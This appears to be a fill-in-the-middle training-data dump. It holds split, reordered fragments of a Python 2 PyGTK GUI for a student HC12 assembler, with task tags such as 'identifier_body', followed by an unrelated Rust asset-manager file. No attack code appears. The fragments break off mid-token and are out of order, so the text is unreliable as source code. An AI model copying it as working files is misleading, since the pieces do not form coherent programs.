i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("T | identifier_body |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,wi | =None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana
| dget,data | identifier_name |
window.py | #!/usr/bin/env python
# coding=utf-8
"""Clase para el dibujado de la interfaz del proyecto del compilador HC12
Centro Universitario de Ciencias Exactas e Ingenierías
Simental Magaña Marcos Eleno Joaquín"""
import pygtk
pygtk.require('2.0')
import gtk
import gtksourceview
import sys
sys.path.append('../src')
from src.analizadorDeLineas import Linea
from src.dictabop import Tabop
from src.contLoc import Contloc
class Ventana:
def __init__(self,title,type=gtk.WINDOW_TOPLEVEL):
# crear, fijar titulo, fijar tamaño y conectar señal de la ventana
self.window = gtk.Window(type) # atributo window recibe objeto ventana del tipo 'type'
self.window.set_title(title) # se fija titulo recibido en el constructor
self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
| file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana | def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter() | random_line_split |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
